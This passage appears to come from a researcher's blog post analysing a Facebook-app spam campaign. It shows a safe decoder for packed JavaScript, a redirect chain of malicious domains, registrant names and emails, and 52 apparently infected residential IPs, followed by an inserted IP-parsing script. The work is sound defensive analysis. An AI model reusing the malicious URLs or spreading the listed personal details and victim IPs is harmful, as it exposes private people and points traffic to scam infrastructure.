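    elif d >= 10:
        digit = chr(ord("a") + d - 10)  # 10..35 -> 'a'..'z'
    else:
        digit = str(d)
    return prefix + digit


def unpack(p: str, base: int, count: int, words: list) -> str:
    """The packer's decode loop, done with re.sub instead of eval.

    Symbols are replaced from highest to lowest, as whole words only, and an
    empty dictionary entry means the symbol is left as it is (exactly what the
    'if(k[c])' test in the blob does)."""
    for c in range(count - 1, -1, -1):
        if c < len(words) and words[c]:
            token = re.escape(encode_token(c, base))
            p = re.sub(r"\b" + token + r"\b", lambda m, w=words[c]: w, p)
    return p


def decode_packed(blob: str) -> str:
    """Locate the wrapper's arguments and return the decoded script text."""
    m = ARGS_RE.search(blob)
    if not m:
        raise ValueError("not a recognised p,a,c,k,e,d packer blob")
    p, base, count, k = m.groups()
    return unpack(js_unescape(p), int(base), int(count), js_unescape(k).split("|"))


def extract_urls(script: str) -> list:
    """Absolute URLs referenced by the decoded script, in order of first appearance."""
    seen, out = set(), []
    for url in re.findall(r"https?://[^\s'\"<>()]+", script):
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


if __name__ == "__main__":
    decoded = decode_packed(SAMPLE_PACKED)
    print(decoded)
    print(extract_urls(decoded))
```

Feeding the real blob in is just `decode_packed(open("js.php.txt").read())`; the only thing to watch is that the whole `eval(...)` call, including the `.split('|')` tail, is in the file, since that tail is what the argument regex anchors on.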


Did you see it? The lovely loading of a .tk site;

weithajs2.tk

This goes on to load (in order);

1. pegasusstar.info/iuko.php

2. dancewithrico.info/weight7.php

3. jump.cttrk.com/aff_c?offer_id=3276&aff_id=1764

4. jump.cttrk.com/aff_r?offer_id=3276&aff_id=1764&url=http%3A%2F%2Ftrack.yourrewardinside.com%2FDefaultPage.aspx%3Fnm%3D014gjfq2jkxp%26s%3D1764e

5. track.yourrewardinside.com/DefaultPage.aspx?nm=014gjfq2jkxp&s=1764e

6. www.tracklead.net/click.track?CID=134785&AFID=138362&ADID=367060&SID=

7. fatcatrewards.com/uk/bonuscash/?l=1031&p=138362

8. www.fatcatrewards.com/uk/bonuscash/?l=1031&p=138362

So including pegasusstar.info and dancewithrico.info, the list now stands at (excluding the .tk site, and the sites you're redirected to such as jump.cttrk.com);

dark-dns-services.com    huang xinyi / shangmenwei@163.com    BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
cantiq.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
ipadapps4you.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
globalamc.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
loungeinthesky.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
joytronic.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
knowledge-library.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
pelletterie2f.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
sinsung.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
spampro.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
pegasusstar.info/iuko.php    Louis Pierra / louispierra@yahoo.ca    eNom, Inc. (R126-LRMS)
dancewithrico.info    Greg Wilson / gwilsonmtl88@yahoo.com    eNom, Inc. (R126-LRMS)
grapillse.com    Vasileva Svetlana / VasilevaSvetlana@mail.com    Namecheap.com
limedicg.com    Gilmutdinov Iskander / GilmutdinovIskander@mail.com    Namecheap.com
franebook.com/usa/app3/js.php    Uhb Xjj / zzkmwc4@126.com    XIN NET TECHNOLOGY CORPORATION


So far, the IPs associated with the newly created domains, along with the IPs for franebook.com, all appear to be residential IPs, leading to the likelihood of its being associated with a botnet (though that's speculation at present, I'm still checking). The IP details are;


1. 109.110.40.235    -    MICROSOF-917DD8    -    196949    -    196949 109.110.32.0/19 PODRYAD-AS Kozitskiy A.M. PI
2. 109.184.225.161    -    109-184-225-161.dynamic.mts-nn.ru    -    25405    -    25405 109.184.0.0/16 NMTS-AS OJSC VolgaTelecom, Nizhny Novgorod
3. 109.87.243.137    -    Failed resolution    -    13188    -    13188 109.87.128.0/17 BANKINFORM-AS Ukraine
4. 112.202.207.15    -    112.202.207.15.pldt.net    -    9299    -    9299 112.202.192.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
5. 122.173.86.128    -    ABTS-North-Dynamic-128.86.173.122.airtelbroadband.in    -    24560    -    24560 122.173.0.0/17 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
6. 122.174.84.73    -    ABTS-TN-dynamic-073.84.174.122.airtelbroadband.in    -    24560    -    24560 122.174.0.0/16 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
7. 122.3.47.21    -    122.3.47.21.pldt.net    -    9299    -    9299 122.3.32.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
8. 123.24.185.18    -    Failed resolution    -    45899    -    45899 123.24.128.0/18 VNPT-AS-VN VNPT Corp
9. 124.104.133.3    -    124.104.133.3.pldt.net    -    9299    -    9299 124.104.128.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
10. 174.6.12.212    -    S01060015b7c35258.vc.shawcable.net    -    6327    -    6327 174.0.0.0/13 SHAW - Shaw Communications Inc.
11. 178.239.117.60    -    Failed resolution    -    41989    -    41989 178.239.112.0/20 KTBAC-AS ET BAC Dobrinka Bacanova
12. 178.74.246.81    -    cpe-178-74-246-81.enet.vn.ua    -    49223    -    49223 178.74.192.0/18 EVEREST-AS _Everest_ Broadcasting Company Ltd
13. 186.18.175.203    -    cpe-186-18-175-203.telecentro-reversos.com.ar    -    27747    -    27747 186.18.172.0/22 Telecentro S.A.
14. 201.213.212.250    -    201-213-212-250.net.prima.net.ar    -    10481    -    10481 201.213.192.0/19 Prima S.A.
15. 201.254.31.122    -    201-254-31-122.speedy.com.ar    -    22927    -    22927 201.254.0.0/16 Telefonica de Argentina
16. 24.121.132.155    -    Failed resolution    -    25994    -    25994 24.121.132.0/24 NPG-001 - NPG Cable, INC
17. 24.21.222.13    -    c-24-21-222-13.hsd1.or.comcast.net    -    7922    -    33490 24.20.0.0/15 COMCAST-33490 - Comcast Cable Communications, Inc.
18. 24.34.229.143    -    c-24-34-229-143.hsd1.ma.comcast.net    -    7015    -    7015 24.34.128.0/17 COMCAST-7015 - Comcast Cable Communications Holdings, Inc
19. 46.8.157.233    -    HOME-FF4CEE39F0    -    51501    -    51501 46.8.128.0/17 KHD-AS Khabarovsk home networks Ltd
20. 61.7.189.248    -    Failed resolution    -    18252    -    18252 61.7.128.0/18 CAT-AS-AP The Communication Authoity of Thailand, CAT
21. 61.81.70.69    -    Failed resolution    -    4766    -    4766 61.80.0.0/14 KIXS-AS-KR Korea Telecom
22. 64.188.224.203    -    host-64-188-224-203.windjammercable.net    -    1246    -    1246 64.188.224.0/22 WINDJAMMER - Windjammer Communications LLC
23. 67.187.251.116    -    c-67-187-251-116.hsd1.ca.comcast.net    -    33651    -    33651 67.187.240.0/20 CMCS - Comcast Cable Communications, Inc.
24. 67.191.123.51    -    c-67-191-123-51.hsd1.fl.comcast.net    -    20214    -    20214 67.191.112.0/20 COMCAST-20214 - Comcast Cable Communications Holdings, Inc
25. 67.48.25.133    -    mta-67-48-25-133.new.res.rr.com    -    11955    -    11955 67.48.16.0/20 SCRR-11955 - Road Runner HoldCo LLC
26. 69.28.212.93    -    Failed resolution    -    13768    -    13768 69.28.212.0/22 PEER1 - Peer 1 Network Inc.
27. 71.164.175.141    -    pool-71-164-175-141.dllstx.fios.verizon.net    -    19262    -    19262 71.164.128.0/17 VZGNI-TRANSIT - Verizon Online LLC
28. 76.105.44.171    -    c-76-105-44-171.hsd1.ca.comcast.net    -    33651    -    33651 76.105.0.0/18 CMCS - Comcast Cable Communications, Inc.
29. 76.113.188.136    -    c-76-113-188-136.hsd1.mn.comcast.net    -    13367    -    13367 76.113.128.0/17 COMCAST-13367 - Comcast Cable Communications Holdings, Inc
30. 76.123.172.58    -    c-76-123-172-58.hsd1.ms.comcast.net    -    22258    -    22258 76.123.128.0/18 COMCAST-22258 - Comcast Cable Communications Holdings, Inc
31. 77.106.199.225    -    Failed resolution    -    42110    -    42110 77.106.192.0/20 STK-AS Closed Joint Stock Company Sochitelecom
32. 77.121.124.29    -    29.124.121.77.pool.smart.vn.ua    -    38962    -    38962 77.121.96.0/19 UA-SMART-AS Broadcasting company _Smart_ Ltd
33. 77.77.245.211    -    cable-77-77-245-211.dynamic.telemach.ba    -    42560    -    42560 77.77.192.0/18 BA-TELEMACH-AS Telemach BiH
34. 77.87.80.54    -    nat-77-87-80-54.gw4.omsk.multinex.ru    -    41771    -    41771 77.87.80.0/21 MKC-OMSK-AS MultiCable Networks LLC
35. 78.106.176.47    -    78-106-176-47.broadband.corbina.ru    -    8402    -    8402 78.106.176.0/21 CORBINA-AS Corbina Telecom
36. 78.36.249.208    -    78-36-249-208.dynamic.pskov.dslavangard.ru    -    8997    -    8997 78.36.0.0/15 ASN-SPBNIT OJSC North-West Telecom Autonomous System
37. 81.56.83.158    -    lan31-1-81-56-83-158.fbx.proxad.net    -    12322    -    12322 81.56.0.0/15 PROXAD Free SAS
38. 82.240.161.55    -    lam06-3-82-240-161-55.fbx.proxad.net    -    12322    -    12322 82.224.0.0/11 PROXAD Free SAS
39. 85.65.29.199    -    85.65.29.199.dynamic.barak-online.net    -    1680    -    1680 85.64.0.0/15 NV-ASN 013 NetVision Ltd.
40. 86.61.43.146    -    BSN-61-43-146.dial-up.dsl.siol.net    -    5603    -    5603 86.61.0.0/17 SIOL-NET Telekom Slovenije d.d.
41. 87.255.93.95    -    Failed resolution    -    15836    -    15836 87.255.64.0/19 AXAUTSYS ARAX I.S.P.
42. 90.24.153.22    -    AMontsouris-551-1-18-22.w90-24.abo.wanadoo.fr    -    3215    -    3215 90.24.128.0/17 AS3215 France Telecom - Orange
43. 91.200.74.206    -    MICROSOF-CDCC83    -    43815    -    43815 91.200.72.0/22 MMV-AS MMV
44. 91.218.17.207    -    pool-91-218-17-207.optima-east.net    -    48882    -    48882 91.218.16.0/22 OPTIMA-SHID-AS Optima-Shid LLC
45. 92.114.244.200    -    host-static-92-114-244-200.moldtelecom.md    -    8926    -    8926 92.114.128.0/17 MOLDTELECOM-AS Moldtelecom Autonomous System
46. 93.124.41.254    -    host-93-124-41-254.dsl.sura.ru    -    24612    -    24612 93.124.0.0/17 PENZA-SVIAZINFORM-AS JSC Volgatelecom, Penza branch
47. 93.170.43.94    -    93.170.43.94.airexpress.net.ua    -    51930    -    51930 93.170.40.0/21 AIREXPRESS-AS Buzova-Budinvest Ltd.
48. 94.41.159.5    -    94.41.159.5.dynamic.ufanet.ru    -    24955    -    24955 94.41.144.0/20 UBN-AS OJSC _Ufanet_
49. 95.69.141.135    -    customer-95-69-141-135.airbites.kh.ua    -    42335    -    42335 95.69.128.0/18 SPHERE-UA Sphere Ltd.
50. 96.245.13.28    -    pool-96-245-13-28.phlapa.fios.verizon.net    -    19262    -    19262 96.245.0.0/16 VZGNI-TRANSIT - Verizon Online LLC
51. 98.142.221.7    -    urlproxy.registrar-servers.com    -    46562    -    46562 98.142.220.0/23 COLO-AT-55-LLC - Colo at 55, LLC
52. 98.196.164.102    -    c-98-196-164-102.hsd1.tx.comcast.net    -    7922    -    33662 98.196.0.0/14 CMCS - Comcast Cable Communications, Inc.
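
The "residential IPs, probably a botnet" reading above rests on the rDNS names and the ASNs, so it helps to parse the list rather than eyeball 52 rows. The following is an added example, not part of the post: a parser for the exact line format used above (`<n>. <ip> - <rdns> - <asn> - <origin-asn> <prefix> <as description>`) that checks each IP actually falls inside the quoted prefix, tags hosts whose reverse names look like consumer access networks, and counts origin ASNs. The `SAMPLE_LINES` are four rows copied from the list, and the keyword list in `RESIDENTIAL_HINTS` is my own heuristic, not something stated in the post; it is a hint for triage, not a verdict.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample: four rows copied from the IP list above, one of them with the
# stray ')' that crept into the pasted output after the hostname.
SAMPLE_LINES = """
3. 109.87.243.137    -    Failed resolution    -    13188    -    13188 109.87.128.0/17 BANKINFORM-AS Ukraine
17. 24.21.222.13    -    c-24-21-222-13.hsd1.or.comcast.net    -    7922    -    33490 24.20.0.0/15 COMCAST-33490 - Comcast Cable Communications, Inc.
23. 67.187.251.116    -    c-67-187-251-116.hsd1.ca.comcast.net    -    33651    -    33651 67.187.240.0/20 CMCS - Comcast Cable Communications, Inc.
51. 98.142.221.7    -    urlproxy.registrar-servers.com)    -    46562    -    46562 98.142.220.0/23 COLO-AT-55-LLC - Colo at 55, LLC
"""

# <n>. <ip>  -  <rdns>  -  <asn>  -  <origin-asn> <prefix> <as description>
LINE_RE = re.compile(
    r"^\s*(\d+)\.\s+(\S+)\s+-\s+(.*?)\s+-\s+(\d+)\s+-\s+(\d+)\s+(\S+)\s+(.*?)\s*$"
)

# Assumption (mine, not the post's): rDNS labels typical of consumer access networks.
RESIDENTIAL_HINTS = (
    "dynamic", "dyn", "pool", "cpe", "dsl", "cable", "hsd1", "fios",
    "broadband", "dial-up", "customer", ".res.", "abo.", "home",
)


def parse_line(line: str):
    """Parse one row into a dict, or return None for lines that are not rows."""
    m = LINE_RE.match(line)
    if not m:
        return None
    idx, ip, rdns, asn, origin, prefix, descr = m.groups()
    rdns = rdns.rstrip(")")  # tolerate a stray ')' pasted after the hostname
    addr = ipaddress.ip_address(ip)
    return {
        "n": int(idx),
        "ip": ip,
        "rdns": rdns,
        "asn": int(asn),
        "origin_asn": int(origin),
        "prefix": prefix,
        "descr": descr,
        # sanity check: the listed prefix really does cover the address
        "prefix_ok": addr in ipaddress.ip_network(prefix, strict=False),
    }


def classify(entry: dict) -> str:
    """'unresolved', 'residential-hint' or 'other', from the reverse name alone."""
    host = entry["rdns"].lower()
    if host.startswith("failed resolution"):
        return "unresolved"
    if any(hint in host for hint in RESIDENTIAL_HINTS):
        return "residential-hint"
    return "other"


def summarise(text: str) -> dict:
    """Totals an analyst wants before calling a set of hosts 'residential'."""
    entries = [e for e in (parse_line(l) for l in text.splitlines()) if e]
    return {
        "total": len(entries),
        "classes": dict(Counter(classify(e) for e in entries)),
        "origin_asns": dict(Counter(e["origin_asn"] for e in entries)),
        "prefix_mismatches": [e["ip"] for e in entries if not e["prefix_ok"]],
    }


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Run it over the full list and the `origin_asns` counter is the interesting part: many different consumer ISPs each contributing one or two hosts is the spread one expects from infected end-user machines, whereas a hosting provider with a single ASN dominating would point the other way; `prefix_mismatches` should be empty, and anything in it means the row was mis-pasted.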


/update 11:16

dot.tk have now suspended weithajs2.tk.

References:

Facebook app pages serve up Javascript and Acai Berry spam
http://sunbeltblog.blogspot.com/2011/03/facebook-app-pages-serve-up-javascript.html
